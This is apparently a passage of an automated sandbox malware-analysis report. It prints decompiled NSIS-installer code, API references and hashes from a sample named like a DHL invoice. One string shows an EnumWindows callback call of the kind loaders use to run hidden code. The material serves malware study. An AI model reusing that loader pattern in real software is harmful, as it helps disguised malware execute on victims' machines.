                                                                            							_a16 = _t159;
                                                                            							_t334 = _t348;
                                                                            							_a8 = _t283;
                                                                            							_t306 = 8;
                                                                            							if(_t348 != 0x111) {
                                                                            								_t320 = _t283;
                                                                            								_t275 = _t159;
                                                                            								_t349 = _t334;
                                                                            								if(_t334 != 0x200) {
                                                                            									_t160 = _t349;
                                                                            									if(_t349 != 0x40b) {
                                                                            										_a8 = _t320;
                                                                            										_t349 = _t160;
                                                                            										_v60 = _t275;
                                                                            										_a16 = _t349;
                                                                            										if(_t160 != 0x40f) {
                                                                            											L88:
                                                                            											if(_t349 == 0x420 && ( *0x435a0c & 0x00000100) != 0) {
                                                                            												_t336 =  ==  ? _t306 : 0;
                                                                            												ShowWindow(_v80, _t336);
                                                                            												ShowWindow(GetDlgItem(_a4, 0x3fe), _t336);
                                                                            											}
                                                                            											L91:
                                                                            											return E0040575B(_t349, _t275, _t320);
                                                                            										}
                                                                            										_t337 = 0;
                                                                            										L63:
                                                                            										E004012DD(_t337, _t337);
                                                                            										if(_t275 != 0) {
                                                                            											_t196 =  ==  ? _t275 : _t275 - 1;
                                                                            											_push( ==  ? _t275 : _t275 - 1);
                                                                            											_push(8);
                                                                            											E004054B6();
                                                                            										}
                                                                            										if(_t320 == 0) {
                                                                            											L71:
                                                                            											E004012DD(_t337, _t337);
                                                                            											_t285 =  *0x435a2c;
                                                                            											_t167 =  *0x42ed6c; // 0x0
                                                                            											_a4 = _t337;
                                                                            											_t338 =  *0x435a28;
                                                                            											_v52 = 0xf030;
                                                                            											if(_t285 <= 0) {
                                                                            												L83:
                                                                            												if( *0x435afe == 0x400) {
                                                                            													InvalidateRect(_v80, 0, 1);
                                                                            												}
                                                                            												if( *((intOrPtr*)( *0x4349e0 + 0x10)) != 0) {
                                                                            													_t170 = E00405835(5);
                                                                            													_push(0);
                                                                            													E00405560(_t285, 0x3ff, 0xfffffffb, _t170);
                                                                            												}
                                                                            												_t306 = 8;
                                                                            												goto L88;
                                                                            											}
                                                                            											_t276 = _a12;
                                                                            											_t340 = _t338 + 8;
                                                                            											_t321 = _v80;
                                                                            											_t350 = _t167;
                                                                            											do {
                                                                            												_t175 =  *((intOrPtr*)(_t350 + _t276 * 4));
                                                                            												_a12 = _t175;
                                                                            												if(_t175 != 0) {
                                                                            													_t307 =  *_t340;
                                                                            													_v52 = _t175;
                                                                            													_v56 = 8;
                                                                            													if((_t307 & 0x00000100) != 0) {
                                                                            														_v56 = 9;
                                                                            														_v40 =  &(_t340[4]);
                                                                            														 *_t340 =  *_t340 & 0xfffffeff;
                                                                            														_a12 = _v52;
                                                                            													}
                                                                            													if((_t307 & 0x00000040) == 0) {
                                                                            														_t288 = (_t307 & 1) + 1;
                                                                            														if((_t307 & 0x00000010) != 0) {
                                                                            															_t288 = _t288 + 3;
                                                                            														}
                                                                            													} else {
                                                                            														_t288 = 3;
                                                                            													}
                                                                            													_v48 = (_t288 << 0x0000000b | _t307 & 0x00000008) + (_t288 << 0x0000000b | _t307 & 0x00000008) | _t307 & 0x00000020;
                                                                            													SendMessageW(_t321, 0x1102, (_t307 >> 0x00000005 & 1) + 1, _a12);
                                                                            													SendMessageW(_t321, 0x113f, 0,  &_v56);
                                                                            													_t285 =  *0x435a2c;
                                                                            												}
                                                                            												_t276 = _t276 + 1;
                                                                            												_t340 =  &(_t340[0x206]);
                                                                            											} while (_t276 < _t285);
                                                                            											_t320 = _a8;
                                                                            											_t275 = _v60;
                                                                            											_t349 = _a16;
                                                                            											goto L83;
                                                                            										} else {
                                                                            											_t320 = E004011A0( *0x42ed6c);
                                                                            											_a4 = _t320;
                                                                            											E00401290(_t320);
                                                                            											_t293 = _t337;
                                                                            											_t311 = _t337;
                                                                            											if(_t320 <= 0) {
                                                                            												L70:
                                                                            												SendMessageW(_v68, 0x14e, _t293, _t337);
                                                                            												_t349 = 0x420;
                                                                            												_a16 = 0x420;
                                                                            												goto L71;
                                                                            											}
                                                                            											do {
                                                                            												_t116 = _t293 + 1; // 0x1
                                                                            												_t194 =  ==  ? _t293 : _t116;
                                                                            												_t311 = _t311 + 1;
                                                                            												_t293 =  ==  ? _t293 : _t116;
                                                                            											} while (_t311 < _t320);
                                                                            											_t337 = 0;
                                                                            											goto L70;
                                                                            										}
                                                                            									}
                                                                            									_t198 =  *0x42ed70; // 0x0
                                                                            									if(_t198 != 0) {
                                                                            										ImageList_Destroy(_t198);
                                                                            									}
                                                                            									_t199 =  *0x42ed6c; // 0x0
                                                                            									if(_t199 != 0) {
                                                                            										GlobalFree(_t199);
                                                                            									}
                                                                            									 *0x42ed70 = 0;
                                                                            									 *0x42ed6c = 0;
                                                                            									 *0x435ab8 = 0;
                                                                            									goto L91;
                                                                            								}
                                                                            								SendMessageW(_v80, 0x200, 0, 0);
                                                                            								_t320 = _a8;
                                                                            								_t275 = _a16;
                                                                            								goto L91;
                                                                            							}
                                                                            							if(_t275 != 0x3f9 || _t275 >> 0x10 != 1) {
                                                                            								goto L91;
                                                                            							} else {
                                                                            								_t342 = _v68;
                                                                            								_t209 = SendMessageW(_t342, 0x147, 0, 0);
                                                                            								if(_t209 == 0xffffffff) {
                                                                            									goto L91;
                                                                            								}
                                                                            								_t277 = SendMessageW;
                                                                            								_t343 = SendMessageW(_t342, 0x150, _t209, 0);
                                                                            								if(_t343 == 0xffffffff ||  *((intOrPtr*)(_v64 + 0x94 + _t343 * 4)) == 0) {
                                                                            									_t343 = 0x20;
                                                                            								}
                                                                            								E00401290(_t343);
                                                                            								_t337 = 0;
                                                                            								SendMessageW(_v0, 0x420, 0, _t343);
                                                                            								_t275 = _t277 | 0xffffffff;
                                                                            								_a4 = 0;
                                                                            								_t349 = 0x40f;
                                                                            								_v64 = _t275;
                                                                            								_t320 = 0;
                                                                            								_a12 = 0x40f;
                                                                            								goto L63;
                                                                            							}
                                                                            						}
                                                                            						_t320 = _t333;
                                                                            						_t275 = _t158;
                                                                            						_t348 = _t282;
                                                                            						if( *((intOrPtr*)(_t333 + 4)) != 0x408) {
                                                                            							goto L45;
                                                                            						}
                                                                            						goto L28;
                                                                            					}
                                                                            					_t320 = 1;
                                                                            					_t275 = _t158;
                                                                            					_t348 = 0x40f;
                                                                            					if(0x40f != 0x413) {
                                                                            						goto L45;
                                                                            					}
                                                                            					goto L26;
                                                                            				} else {
                                                                            					_v76 = 0;
                                                                            					_t326 = 2;
                                                                            					 *0x435ab8 = _t330;
                                                                            					 *0x42ed6c = GlobalAlloc(0x40,  *0x435a2c << 2);
                                                                            					_t235 = LoadImageW( *0x4349f4, 0x6e, 0, 0, 0, 0);
                                                                            					 *0x42ed68 =  *0x42ed68 | 0xffffffff;
                                                                            					_t344 = _t235;
                                                                            					 *0x42dd64 = SetWindowLongW(_t347, 0xfffffffc, E004058D0);
                                                                            					_t238 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                            					 *0x42ed70 = _t238;
                                                                            					ImageList_AddMasked(_t238, _t344, 0xff00ff);
                                                                            					SendMessageW(_t347, 0x1109, _t326,  *0x42ed70);
                                                                            					if(SendMessageW(_t347, 0x111c, 0, 0) < 0x10) {
                                                                            						SendMessageW(_t347, 0x111b, 0x10, 0);
                                                                            					}
                                                                            					DeleteObject(_t344);
                                                                            					_t352 = _v72;
                                                                            					_t301 = 0;
                                                                            					_t345 = 0;
                                                                            					do {
                                                                            						_t245 =  *((intOrPtr*)(_v68 + 0x94 + _t345 * 4));
                                                                            						if(_t245 != 0) {
                                                                            							_push(_t245);
                                                                            							_push(_t301);
                                                                            							SendMessageW(_t352, 0x151, SendMessageW(_t352, 0x143, 0, E00405EBA()), _t345);
                                                                            							_t270 =  ==  ? _t326 : 0;
                                                                            							_t301 = 0;
                                                                            							_t326 =  ==  ? _t326 : 0;
                                                                            						}
                                                                            						_t345 = _t345 + 1;
                                                                            					} while (_t345 < 0x21);
                                                                            					_t279 = _a12;
                                                                            					_v64 = _t326;
                                                                            					_push( *((intOrPtr*)(_t279 + 0x30 + _t326 * 4)));
                                                                            					_push(0x15);
                                                                            					E0040551A(_v0);
                                                                            					_push( *((intOrPtr*)(_t279 + 0x34 + _t326 * 4)));
                                                                            					_push(0x16);
                                                                            					E0040551A(_v0);
                                                                            					_t354 = _v108;
                                                                            					_t302 = 0;
                                                                            					_t280 = 0;
                                                                            					_t346 = 0;
                                                                            					if( *0x435a2c <= 0) {
                                                                            						L19:
                                                                            						SetWindowLongW(_t354, 0xfffffff0, GetWindowLongW(_t354, 0xfffffff0) & 0xfffffffb);
                                                                            						goto L20;
                                                                            					} else {
                                                                            						_t329 = _t355[6] + 0x18;
                                                                            						do {
                                                                            							if( *_t329 == _t302) {
                                                                            								L16:
                                                                            								_t253 = _v96;
                                                                            								goto L17;
                                                                            							}
                                                                            							_t319 = 0x20;
                                                                            							_v76 = _t280;
                                                                            							_v72 = 0xffff0002;
                                                                            							_v68 = 0xd;
                                                                            							_v56 = _t319;
                                                                            							_t355[0x15] = _t346;
                                                                            							_v52 = _t329;
                                                                            							_v60 =  *(_t329 - 0x10) & _t319;
                                                                            							if(( *(_t329 - 0x10) & 0x00000002) == 0) {
                                                                            								if(( *(_t329 - 0x10) & 0x00000004) == 0) {
                                                                            									_t257 = SendMessageW(_t354, 0x1132, _t302,  &_v76);
                                                                            									_t303 =  *0x42ed6c; // 0x0
                                                                            									 *(_t303 + _t346 * 4) = _t257;
                                                                            								} else {
                                                                            									_t280 = SendMessageW(_t354, 0x110a, 3, _t280);
                                                                            								}
                                                                            								_t302 = 0;
                                                                            								goto L16;
                                                                            							}
                                                                            							_v68 = 0x4d;
                                                                            							_t355[0x14] = 1;
                                                                            							_t280 = SendMessageW(_t354, 0x1132, _t302,  &_v76);
                                                                            							_t263 =  *0x42ed6c; // 0x0
                                                                            							 *(_t263 + _t346 * 4) = _t280;
                                                                            							_t253 = 1;
                                                                            							_t302 = 0;
                                                                            							_v96 = 1;
                                                                            							L17:
                                                                            							_t346 = _t346 + 1;
                                                                            							_t329 = _t329 + 0x818;
                                                                            						} while (_t346 <  *0x435a2c);
                                                                            						if(_t253 != 0) {
                                                                            							L20:
                                                                            							if(_v80 != 0) {
                                                                            								_push(_t354);
                                                                            							} else {
                                                                            								_t327 = _v88;
                                                                            								ShowWindow(_t327, 5);
                                                                            								_push(_t327);
                                                                            							}
                                                                            							E00405503();
                                                                            							goto L24;
                                                                            						}
                                                                            						goto L19;
                                                                            					}
                                                                            				}
                                                                            			}























































































                                                                            0x0040441e
                                                                            0x0040442f
                                                                            0x0040443e
                                                                            0x0040444a
                                                                            0x00404451
                                                                            0x0040445a
                                                                            0x00404468
                                                                            0x0040446c
                                                                            0x00404698
                                                                            0x004046a4
                                                                            0x004046af
                                                                            0x004046b3
                                                                            0x004046bb
                                                                            0x004046c3
                                                                            0x004046ce
                                                                            0x004046de
                                                                            0x004046e0
                                                                            0x004046f5
                                                                            0x004046ff
                                                                            0x00404701
                                                                            0x00404703
                                                                            0x00404705
                                                                            0x0040472e
                                                                            0x00404734
                                                                            0x00404736
                                                                            0x0040473a
                                                                            0x0040473c
                                                                            0x00404740
                                                                            0x00404746
                                                                            0x0040474c
                                                                            0x00404750
                                                                            0x00404754
                                                                            0x00404759
                                                                            0x0040475e
                                                                            0x0040477b
                                                                            0x00404760
                                                                            0x00404773
                                                                            0x00404773
                                                                            0x00404785
                                                                            0x0040478a
                                                                            0x0040478e
                                                                            0x004047a1
                                                                            0x004047a2
                                                                            0x004047a4
                                                                            0x004047a4
                                                                            0x00404759
                                                                            0x00404740
                                                                            0x004047ab
                                                                            0x004047ad
                                                                            0x004047b5
                                                                            0x004047c6
                                                                            0x004047cc
                                                                            0x004047cc
                                                                            0x004047d4
                                                                            0x004047d6
                                                                            0x004047e1
                                                                            0x004047e5
                                                                            0x004047e9
                                                                            0x004047f0
                                                                            0x004047eb
                                                                            0x004047eb
                                                                            0x004047eb
                                                                            0x004047f3
                                                                            0x004047f3
                                                                            0x004047d4
                                                                            0x004047f7
                                                                            0x004047f7
                                                                            0x004047f9
                                                                            0x004047fb
                                                                            0x004047ff
                                                                            0x00404801
                                                                            0x00404807
                                                                            0x0040480e
                                                                            0x004048a9
                                                                            0x004048ab
                                                                            0x004048b2
                                                                            0x004048b6
                                                                            0x004048d4
                                                                            0x004048dc
                                                                            0x00404914
                                                                            0x00404918
                                                                            0x0040491a
                                                                            0x0040491e
                                                                            0x00404927
                                                                            0x00404ae0
                                                                            0x00404ae6
                                                                            0x00404af9
                                                                            0x00404b01
                                                                            0x00404b18
                                                                            0x00404b18
                                                                            0x00404b1e
                                                                            0x00404b2d
                                                                            0x00404b2d
                                                                            0x0040492d
                                                                            0x0040492f
                                                                            0x00404931
                                                                            0x00404938
                                                                            0x00404940
                                                                            0x00404943
                                                                            0x00404944
                                                                            0x00404946
                                                                            0x00404946
                                                                            0x0040494d
                                                                            0x004049a3
                                                                            0x004049a5
                                                                            0x004049aa
                                                                            0x004049b0
                                                                            0x004049b5
                                                                            0x004049b9
                                                                            0x004049bf
                                                                            0x004049c9
                                                                            0x00404a9f
                                                                            0x00404aad
                                                                            0x00404ab8
                                                                            0x00404ab8
                                                                            0x00404ac6
                                                                            0x00404aca
                                                                            0x00404acf
                                                                            0x00404ad8
                                                                            0x00404ad8
                                                                            0x00404adf
                                                                            0x00000000
                                                                            0x00404adf
                                                                            0x004049cf
                                                                            0x004049d3
                                                                            0x004049d6
                                                                            0x004049da
                                                                            0x004049dc
                                                                            0x004049dc
                                                                            0x004049e0
                                                                            0x004049e6
                                                                            0x004049ec
                                                                            0x004049ee
                                                                            0x004049f2
                                                                            0x00404a00
                                                                            0x00404a05
                                                                            0x00404a0d
                                                                            0x00404a11
                                                                            0x00404a1b
                                                                            0x00404a1b
                                                                            0x00404a22
                                                                            0x00404a30
                                                                            0x00404a34
                                                                            0x00404a36
                                                                            0x00404a36
                                                                            0x00404a24
                                                                            0x00404a26
                                                                            0x00404a26
                                                                            0x00404a56
                                                                            0x00404a64
                                                                            0x00404a78
                                                                            0x00404a7e
                                                                            0x00404a7e
                                                                            0x00404a84
                                                                            0x00404a85
                                                                            0x00404a8b
                                                                            0x00404a93
                                                                            0x00404a97
                                                                            0x00404a9b
                                                                            0x00000000
                                                                            0x0040494f
                                                                            0x0040495a
                                                                            0x0040495d
                                                                            0x00404961
                                                                            0x00404966
                                                                            0x00404968
                                                                            0x0040496c
                                                                            0x00404989
                                                                            0x00404994
                                                                            0x0040499a
                                                                            0x0040499f
                                                                            0x00000000
                                                                            0x0040499f
                                                                            0x00404972
                                                                            0x0040497a
                                                                            0x0040497d
                                                                            0x00404980
                                                                            0x00404981
                                                                            0x00404983
                                                                            0x00404987
                                                                            0x00000000
                                                                            0x00404987
                                                                            0x0040494d
                                                                            0x004048de
                                                                            0x004048e5
                                                                            0x004048e8
                                                                            0x004048e8
                                                                            0x004048ee
                                                                            0x004048f5
                                                                            0x004048f8
                                                                            0x004048f8
                                                                            0x00404900
                                                                            0x00404905
                                                                            0x0040490a
                                                                            0x00000000
                                                                            0x0040490a
                                                                            0x004048c1
                                                                            0x004048c7
                                                                            0x004048cb
                                                                            0x00000000
                                                                            0x004048cb
                                                                            0x0040481c
                                                                            0x00000000
                                                                            0x00404833
                                                                            0x00404833
                                                                            0x00404841
                                                                            0x0040484a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404850
                                                                            0x00404862
                                                                            0x00404867
                                                                            0x00404878
                                                                            0x00404878
                                                                            0x0040487a
                                                                            0x00404880
                                                                            0x0040488c
                                                                            0x0040488e
                                                                            0x00404891
                                                                            0x00404895
                                                                            0x0040489a
                                                                            0x0040489e
                                                                            0x004048a0
                                                                            0x00000000
                                                                            0x004048a0
                                                                            0x0040481c
                                                                            0x004046e9
                                                                            0x004046eb
                                                                            0x004046ed
                                                                            0x004046ef
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004046ef
                                                                            0x004046d0
                                                                            0x004046d2
                                                                            0x004046d4
                                                                            0x004046d8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404472
                                                                            0x00404472
                                                                            0x0040447d
                                                                            0x00404484
                                                                            0x00404490
                                                                            0x004044a3
                                                                            0x004044a9
                                                                            0x004044b0
                                                                            0x004044c0
                                                                            0x004044d0
                                                                            0x004044dd
                                                                            0x004044e2
                                                                            0x004044f5
                                                                            0x00404506
                                                                            0x00404513
                                                                            0x00404513
                                                                            0x00404516
                                                                            0x0040451c
                                                                            0x00404520
                                                                            0x00404522
                                                                            0x00404524
                                                                            0x00404528
                                                                            0x00404531
                                                                            0x00404533
                                                                            0x00404534
                                                                            0x0040454e
                                                                            0x00404555
                                                                            0x00404558
                                                                            0x0040455a
                                                                            0x0040455a
                                                                            0x0040455c
                                                                            0x0040455d
                                                                            0x00404562
                                                                            0x0040456a
                                                                            0x0040456e
                                                                            0x00404572
                                                                            0x00404575
                                                                            0x0040457a
                                                                            0x0040457e
                                                                            0x00404581
                                                                            0x00404586
                                                                            0x0040458a
                                                                            0x0040458c
                                                                            0x0040458e
                                                                            0x00404596
                                                                            0x00404665
                                                                            0x00404675
                                                                            0x00000000
                                                                            0x0040459c
                                                                            0x004045a0
                                                                            0x004045a3
                                                                            0x004045a6
                                                                            0x0040464a
                                                                            0x0040464a
                                                                            0x00000000
                                                                            0x0040464a
                                                                            0x004045b1
                                                                            0x004045b4
                                                                            0x004045bc
                                                                            0x004045c4
                                                                            0x004045cc
                                                                            0x004045d0
                                                                            0x004045d4
                                                                            0x004045d8
                                                                            0x004045dc
                                                                            0x00404618
                                                                            0x00404639
                                                                            0x0040463f
                                                                            0x00404645
                                                                            0x0040461a
                                                                            0x00404629
                                                                            0x00404629
                                                                            0x00404648
                                                                            0x00000000
                                                                            0x00404648
                                                                            0x004045e0
                                                                            0x004045e9
                                                                            0x004045ff
                                                                            0x00404601
                                                                            0x00404606
                                                                            0x0040460b
                                                                            0x0040460c
                                                                            0x0040460e
                                                                            0x0040464e
                                                                            0x0040464e
                                                                            0x0040464f
                                                                            0x00404655
                                                                            0x00404663
                                                                            0x0040467b
                                                                            0x00404680
                                                                            0x00404692
                                                                            0x00404682
                                                                            0x00404682
                                                                            0x00404689
                                                                            0x0040468f
                                                                            0x0040468f
                                                                            0x00404693
                                                                            0x00000000
                                                                            0x00404693
                                                                            0x00000000
                                                                            0x00404663
                                                                            0x00404596

                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404436
                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404442
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 0040448A
                                                                            • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004044A3
                                                                            • SetWindowLongW.USER32(00000000,000000FC,Function_000058D0), ref: 004044BA
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004044D0
                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004044E2
                                                                            • SendMessageW.USER32(00000000,00001109,00000002), ref: 004044F5
                                                                            • SendMessageW.USER32(00000000,0000111C,00000000,00000000), ref: 00404501
                                                                            • SendMessageW.USER32(00000000,0000111B,00000010,00000000), ref: 00404513
                                                                            • DeleteObject.GDI32(00000000), ref: 00404516
                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404544
                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040454E
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 004045F9
                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404623
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404639
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404668
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404675
                                                                            • ShowWindow.USER32(?,00000005), ref: 00404689
                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 004047C6
                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404841
                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404860
                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040488C
                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004048C1
                                                                            • ImageList_Destroy.COMCTL32(00000000), ref: 004048E8
                                                                            • GlobalFree.KERNEL32(00000000), ref: 004048F8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ImageWindow$List_Long$GlobalItem$AllocCreateDeleteDestroyFreeLoadMaskedObjectShow
                                                                            • String ID: M
                                                                            • API String ID: 1688767230-3664761504
                                                                            • Opcode ID: 593f695f4e0e7a559147944b019e1e190396842a77f5fef561b0bfd50dce2793
                                                                            • Instruction ID: 0c70e663620b203d4295ddec51a1238c6828a203a6db769dd6a487d059f7c121
                                                                            • Opcode Fuzzy Hash: 593f695f4e0e7a559147944b019e1e190396842a77f5fef561b0bfd50dce2793
                                                                            • Instruction Fuzzy Hash: D812CEB1604301AFD7209F24DC85A6BB7E9EBC8314F104A3EFA95E72E1D7789C018B59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 81%
                                                                            			E00404085(void* __ebx, void* __ebp, struct HWND__* _a4, unsigned int _a8, unsigned int _a12, intOrPtr _a16) {
                                                                            				signed int _v4;
                                                                            				WCHAR* _v8;
                                                                            				intOrPtr _v12;
                                                                            				intOrPtr _v24;
                                                                            				signed int _v28;
                                                                            				struct HWND__* _v32;
                                                                            				unsigned int _v36;
                                                                            				signed int _v40;
                                                                            				long _v48;
                                                                            				unsigned int _v52;
                                                                            				signed int _v56;
                                                                            				long _v64;
                                                                            				long _v68;
                                                                            				long _v72;
                                                                            				unsigned int _v92;
                                                                            				unsigned int _v96;
                                                                            				unsigned int _t59;
                                                                            				unsigned int _t61;
                                                                            				unsigned int _t63;
                                                                            				unsigned int _t65;
                                                                            				unsigned int _t70;
                                                                            				intOrPtr _t72;
                                                                            				signed int _t85;
                                                                            				unsigned int _t86;
                                                                            				unsigned int _t89;
                                                                            				signed int _t90;
                                                                            				unsigned int _t92;
                                                                            				unsigned int _t95;
                                                                            				int _t98;
                                                                            				unsigned int _t103;
                                                                            				unsigned int _t108;
                                                                            				unsigned int _t110;
                                                                            				WCHAR* _t116;
                                                                            				signed int _t117;
                                                                            				unsigned int _t118;
                                                                            				unsigned int _t120;
                                                                            				short* _t122;
                                                                            				struct HWND__* _t123;
                                                                            				struct HWND__* _t124;
                                                                            				unsigned int _t125;
                                                                            				void* _t128;
                                                                            				unsigned int _t134;
                                                                            				unsigned int _t135;
                                                                            				WCHAR* _t138;
                                                                            				unsigned int _t139;
                                                                            				void* _t140;
                                                                            				unsigned int _t141;
                                                                            				unsigned int _t142;
                                                                            				intOrPtr _t143;
                                                                            				unsigned int _t147;
                                                                            				struct HWND__* _t149;
                                                                            				long* _t150;
                                                                            
                                                                            				_t150 =  &_v72;
                                                                            				_t125 =  *0x42dd4c;
                                                                            				_t135 = _a8;
                                                                            				_t138 = L"user32::EnumWindows(i r1 ,i 0)" + ( *(_t125 + 0x3c) << 0xb);
                                                                            				_v52 = _t125;
                                                                            				if(_t135 != 0x40b) {
                                                                            					__eflags = _t135 - 0x110;
                                                                            					if(_t135 != 0x110) {
                                                                            						__eflags = _t135 - 0x111;
                                                                            						if(_t135 != 0x111) {
                                                                            							L19:
                                                                            							_t59 = _t135;
                                                                            							__eflags = _t135 - 0x40f;
                                                                            							if(__eflags == 0) {
                                                                            								L21:
                                                                            								_v56 = 0;
                                                                            								E00406A3A(0x3fb, _t138);
                                                                            								_t61 = E00406638(__eflags, _t138);
                                                                            								_t116 = 0x42e568;
                                                                            								_t147 = 1;
                                                                            								__eflags = _t61;
                                                                            								_t127 =  ==  ? 1 : 0;
                                                                            								_v4 =  ==  ? 1 : 0;
                                                                            								E00406B1A(0x42e568, _t138);
                                                                            								_t63 = E004068E6(1);
                                                                            								_v96 = _t63;
                                                                            								__eflags = _t63;
                                                                            								if(_t63 == 0) {
                                                                            									L28:
                                                                            									E00406B1A(_t116, _t138);
                                                                            									_t65 = E00406BC5(_t116);
                                                                            									__eflags = _t65;
                                                                            									if(_t65 != 0) {
                                                                            										__eflags = 0;
                                                                            										 *_t65 = 0;
                                                                            									}
                                                                            									_t70 = GetDiskFreeSpaceW(_t116,  &_v68,  &_v64,  &_v72,  &_v48);
                                                                            									__eflags = _t70;
                                                                            									if(_t70 == 0) {
                                                                            										_t139 = _v36;
                                                                            										_t117 = _v40;
                                                                            										_t147 = _v56;
                                                                            										goto L35;
                                                                            									} else {
                                                                            										_t85 = MulDiv(_v68 * _v64, _v72, 0x400);
                                                                            										asm("cdq");
                                                                            										_t117 = _t85;
                                                                            										_t139 = _t134;
                                                                            										L33:
                                                                            										_v40 = _t117;
                                                                            										_v36 = _t139;
                                                                            										L35:
                                                                            										_t128 = E00405835(5);
                                                                            										__eflags = _t147;
                                                                            										if(_t147 == 0) {
                                                                            											L40:
                                                                            											_t118 = _a8;
                                                                            											L41:
                                                                            											_t72 =  *0x4349e0;
                                                                            											__eflags =  *(_t72 + 0x10);
                                                                            											if( *(_t72 + 0x10) != 0) {
                                                                            												_push(0);
                                                                            												E00405560(_t128, 0x3ff, 0xfffffffb, _t128);
                                                                            												__eflags = _t147;
                                                                            												if(_t147 == 0) {
                                                                            													SetDlgItemTextW(_t150[0x19], 0x400, 0x4095b0);
                                                                            												} else {
                                                                            													_push(_v40);
                                                                            													E00405560(_t128, 0x400, 0xfffffffc, _t150[0xd]);
                                                                            												}
                                                                            											}
                                                                            											 *0x435ae4 = _t118;
                                                                            											__eflags = _t118;
                                                                            											if(_t118 == 0) {
                                                                            												_t118 = E00401533(7);
                                                                            											}
                                                                            											_t140 = 0;
                                                                            											__eflags =  *(_v52 + 0x14) & 0x00000400;
                                                                            											_t141 =  ==  ? _t118 : _t140;
                                                                            											__eflags = _t141;
                                                                            											EnableWindow( *0x42dd54, 0 | _t141 == 0x00000000);
                                                                            											__eflags = _t141;
                                                                            											if(_t141 == 0) {
                                                                            												__eflags =  *0x42dd60 - _t141;
                                                                            												if( *0x42dd60 == _t141) {
                                                                            													E0040553C();
                                                                            												}
                                                                            											}
                                                                            											 *0x42dd60 =  *0x42dd60 & 0x00000000;
                                                                            											__eflags =  *0x42dd60;
                                                                            											goto L51;
                                                                            										}
                                                                            										__eflags = _t139;
                                                                            										if(__eflags > 0) {
                                                                            											goto L40;
                                                                            										}
                                                                            										if(__eflags < 0) {
                                                                            											L39:
                                                                            											_t118 = 2;
                                                                            											goto L41;
                                                                            										}
                                                                            										__eflags = _t117 - _t128;
                                                                            										if(_t117 >= _t128) {
                                                                            											goto L40;
                                                                            										}
                                                                            										goto L39;
                                                                            									}
                                                                            								}
                                                                            								_t120 = 0;
                                                                            								__eflags = 0;
                                                                            								while(1) {
                                                                            									_t86 =  *_t63(0x42e568,  &_v40,  &_v64,  &_v48);
                                                                            									__eflags = _t86;
                                                                            									if(_t86 != 0) {
                                                                            										break;
                                                                            									}
                                                                            									__eflags = _t120;
                                                                            									if(_t120 != 0) {
                                                                            										 *_t120 = _t86;
                                                                            									}
                                                                            									_t122 = E00406D10(0x42e568);
                                                                            									 *_t122 = 0;
                                                                            									_t120 = _t122 - 2;
                                                                            									_t89 = 0x5c;
                                                                            									 *_t120 = _t89;
                                                                            									_t63 = _v92;
                                                                            									__eflags = _t120 - 0x42e568;
                                                                            									if(_t120 != 0x42e568) {
                                                                            										continue;
                                                                            									} else {
                                                                            										_t116 = 0x42e568;
                                                                            										goto L28;
                                                                            									}
                                                                            								}
                                                                            								_t142 = _v52;
                                                                            								_t117 = (_t142 << 0x00000020 | _v56) >> 0xa;
                                                                            								_t139 = _t142 >> 0xa;
                                                                            								__eflags = _t139;
                                                                            								goto L33;
                                                                            							}
                                                                            							__eflags = _t59 - 0x405;
                                                                            							if(__eflags != 0) {
                                                                            								goto L51;
                                                                            							}
                                                                            							goto L21;
                                                                            						}
                                                                            						_t134 = _a12;
                                                                            						_t90 = _t134 & 0x0000ffff;
                                                                            						__eflags = _t90 - 0x3fb;
                                                                            						if(_t90 != 0x3fb) {
